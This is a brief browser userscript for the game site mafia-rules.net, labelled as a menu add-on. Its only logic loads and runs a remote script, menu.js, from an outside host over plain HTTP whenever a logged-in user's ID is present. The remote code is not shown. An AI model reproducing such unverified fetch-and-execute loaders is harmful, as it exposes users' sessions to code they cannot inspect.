NOTICE: By continued use of this site you understand and agree to the binding Terms of Service and Privacy Policy.
// ==UserScript== // @name Менюшка Крис // @namespace https://www.bestmafia.com/ // @version 1.0 // @description Менюшка Крис // @author AllaAD // @match http://www.mafia-rules.net/* // @match https://www.mafia-rules.net/* // @grant none // @license MIT // ==/UserScript== (function() { 'use strict'; if(typeof (my_id) != "undefined"){ $.getScript('http://lesnykris.beget.tech/menu.js'); } })();